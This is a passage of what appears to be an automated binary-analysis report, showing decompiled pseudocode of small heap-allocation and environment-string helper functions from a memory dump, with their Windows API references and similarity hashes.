                                0x4a556950
                                0x4a556955
                                0x4a5569e0
                                0x4a5569e0
                                0x4a5569e0
                                0x4a55695b
                                0x4a55695b
                                0x4a556960
                                0x00000000
                                0x00000000
                                0x4a556962
                                0x4a556963
                                0x4a556966
                                0x4a556966
                                0x4a55696e
                                0x4a556970
                                0x4a556975
                                0x4a556979
                                0x4a556980
                                0x4a564103
                                0x4a564109
                                0x4a564109
                                0x4a564103
                                0x4a556989
                                0x4a556990
                                0x4a560166
                                0x4a560166
                                0x4a55699a
                                0x4a5569b2
                                0x4a5569b7
                                0x4a5569bf
                                0x4a5569c7
                                0x4a5569d2
                                0x4a5569da
                                0x4a5569dd
                                0x00000000

                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0000233F,0000233F,4A58C642,00000000,0000233F,?,4A55DA7E,4A569563,00000000,00000000,00000000,00000000,?,4A56FCAB,4A563723), ref: 4A5569A9
                                • HeapFree.KERNEL32(00000000,?,4A55DA7E), ref: 4A5569B2
                                • GetProcessHeap.KERNEL32(00000000,0000233F,?,?,?,4A55DA7E,4A569563,00000000,00000000,00000000,00000000,?,4A56FCAB,4A563723,4A58C642,4A551BBC), ref: 4A5569D7
                                • HeapFree.KERNEL32(00000000,?,4A55DA7E), ref: 4A5569DA
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$FreeProcess
                                • String ID:
                                • API String ID: 3859560861-0
                                • Opcode ID: 332dd6c39a88020c69a40d64c8fa3674edfb0c7531a7472133702e905a2e29da
                                • Instruction ID: c3f24e35730c0e243343374f43d24870ecbe151e1ff1334472d7b3338790b4f1
                                • Opcode Fuzzy Hash: 332dd6c39a88020c69a40d64c8fa3674edfb0c7531a7472133702e905a2e29da
                                • Instruction Fuzzy Hash: 341101B6105290AAD712AF69CB00B767FBCEF45354F48041BE189DFA6EC235EC41D760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55C039, Relevance: 5.1, APIs: 4, Instructions: 54memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 94%
                                			E4A55C039(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				intOrPtr* _t7;
				void* _t14;
				void* _t15;
				void* _t20;
				void* _t24;
				intOrPtr _t25;
				void* _t27;

				_push(_t20);
				_t7 = 0x4a575260;
				_t1 = _t7 + 2; // 0x4a575262
				_t24 = _t1;
				do {
					_t25 =  *_t7;
					_t7 = _t7 + 2;
				} while (_t25 != 0);
				_t2 = (_t7 - _t24 >> 1) + 1; // 0x4a575263
				_t27 = _t2;
				E4A552C56(_t20, _t25, _t27, 0x4a575260, 0x104, 0);
				_t14 = HeapAlloc(GetProcessHeap(), 0, _t27 + _t27);
				_v8 = _t14;
				if(_t14 == 0) {
					L6:
					_t15 = 0;
				} else {
					E4A55185A(_t14, _t27, 0x4a575260);
					if(E4A55C0AE(_v8) == 0) {
						HeapFree(GetProcessHeap(), 0, _v8);
						goto L6;
					} else {
						_t15 = 1;
					}
				}
				return _t15;
			}













                                0x4a55c03f
                                0x4a55c046
                                0x4a55c049
                                0x4a55c049
                                0x4a55c04c
                                0x4a55c04c
                                0x4a55c050
                                0x4a55c051
                                0x4a55c062
                                0x4a55c062
                                0x4a55c065
                                0x4a55c079
                                0x4a55c07f
                                0x4a55c084
                                0x4a55c0a5
                                0x4a55c0a5
                                0x4a55c086
                                0x4a55c089
                                0x4a55c098
                                0x4a5681dc
                                0x00000000
                                0x4a55c09e
                                0x4a55c09e
                                0x4a55c09e
                                0x4a55c098
                                0x4a55c0a4

                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000000,4A575260,00000104,00000000), ref: 4A55C076
                                • HeapAlloc.KERNEL32(00000000), ref: 4A55C079
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$AllocProcess
                                • String ID:
                                • API String ID: 1617791916-0
                                • Opcode ID: 459f61655fe448b0efb70713074310e83f3fce2a64a998898853790003b7d8f8
                                • Instruction ID: 46c07077ef40cfe839fa6ba07d0344f2c8e5b141ecb56b44cac062bead174248
                                • Opcode Fuzzy Hash: 459f61655fe448b0efb70713074310e83f3fce2a64a998898853790003b7d8f8
                                • Instruction Fuzzy Hash: E4018471601206BAE6106B65CE49EAF3BFCEF41755F010052F505DB56DEA70DE01D760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A556FD6, Relevance: 5.0, APIs: 4, Instructions: 33memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 44%
                                			E4A556FD6(void* __ecx) {
				long _t4;
				void* _t9;
				void* _t12;

				_t9 = __ecx;
				_t12 = HeapAlloc(GetProcessHeap(), 8, 4);
				if(_t12 == 0) {
					L4:
					return 0;
				}
				_t4 = E4A5516AD();
				 *_t12 = _t4;
				if(_t4 == 0) {
					HeapFree(GetProcessHeap(), _t4, _t12);
					_push(0);
					_push(0x233a);
					E4A556D44(_t9);
					goto L4;
				}
				return _t12;
			}






                                0x4a556fd6
                                0x4a556fed
                                0x4a556ff1
                                0x4a56524a
                                0x00000000
                                0x4a56524a
                                0x4a556ff7
                                0x4a556ffc
                                0x4a557000
                                0x4a565256
                                0x4a56525c
                                0x4a56525e
                                0x4a565263
                                0x00000000
                                0x4a565269
                                0x00000000

                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000004,?,4A574210,4A557B02,4A558533), ref: 4A556FE4
                                • HeapAlloc.KERNEL32(00000000), ref: 4A556FE7
                                  • Part of subcall function 4A5516AD: GetEnvironmentStringsW.KERNEL32(?,4A574210,4A557AF8,4A558533), ref: 4A5516B1
                                  • Part of subcall function 4A5516AD: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000), ref: 4A5516CB
                                  • Part of subcall function 4A5516AD: HeapAlloc.KERNEL32(00000000), ref: 4A5516D2
                                  • Part of subcall function 4A5516AD: memcpy.MSVCRT ref: 4A5516E1
                                  • Part of subcall function 4A5516AD: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 4A5516EA
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 4A565253
                                • HeapFree.KERNEL32(00000000), ref: 4A565256
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$Process$AllocEnvironmentFreeStrings$memcpy
                                • String ID:
                                • API String ID: 197374240-0
                                • Opcode ID: 3349ddb228bc9ef8bb82e6e004a423b492bbf8742e20d42964de37e632b3033b
                                • Instruction ID: 6e3935c19111a5e31d678522e3de845e6f87121ca57e1396c816f84b22b9fe33
                                • Opcode Fuzzy Hash: 3349ddb228bc9ef8bb82e6e004a423b492bbf8742e20d42964de37e632b3033b
                                • Instruction Fuzzy Hash: 99E06DB265120276D72136BA9E0DB172E6DAFD9775F190826F209DA588EE70D840C724
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5569E8, Relevance: 5.0, APIs: 4, Instructions: 24memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E4A5569E8(void* _a4) {
				void* _t6;

				_t6 = _a4;
				HeapFree(GetProcessHeap(), 0,  *_t6);
				return HeapFree(GetProcessHeap(), 0, _t6);
			}




                                0x4a5569ee
                                0x4a556a06
                                0x4a556a14

                                APIs
                                • GetProcessHeap.KERNEL32(00000000,4A574210,766F14B9,0000233F,766F1499,?,4A5569C4,?,?,?,4A55DA7E,4A569563,00000000,00000000,00000000,00000000), ref: 4A5569FD
                                • HeapFree.KERNEL32(00000000,?,4A5569C4), ref: 4A556A06
                                • GetProcessHeap.KERNEL32(00000000,4A574210,?,4A5569C4,?,?,?,4A55DA7E,4A569563,00000000,00000000,00000000,00000000,?,4A56FCAB,4A563723), ref: 4A556A0B
                                • HeapFree.KERNEL32(00000000,?,4A5569C4), ref: 4A556A0E
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$FreeProcess
                                • String ID:
                                • API String ID: 3859560861-0
                                • Opcode ID: e53a556945c7f226f5e1e41f8bc71d13ec63134b6d0f95332917827ffd0a691f
                                • Instruction ID: 381f60008abc25f0f76e649cc6f597f99b8e4522eaa942988f2c974e8eb1fdf5
                                • Opcode Fuzzy Hash: e53a556945c7f226f5e1e41f8bc71d13ec63134b6d0f95332917827ffd0a691f
                                • Instruction Fuzzy Hash: F0D0ECB360525877D61076DB9D44F577F6CEBC9765F450023F308C71408571AC108BB1
                                Uniqueness

                                Uniqueness Score: -1.00%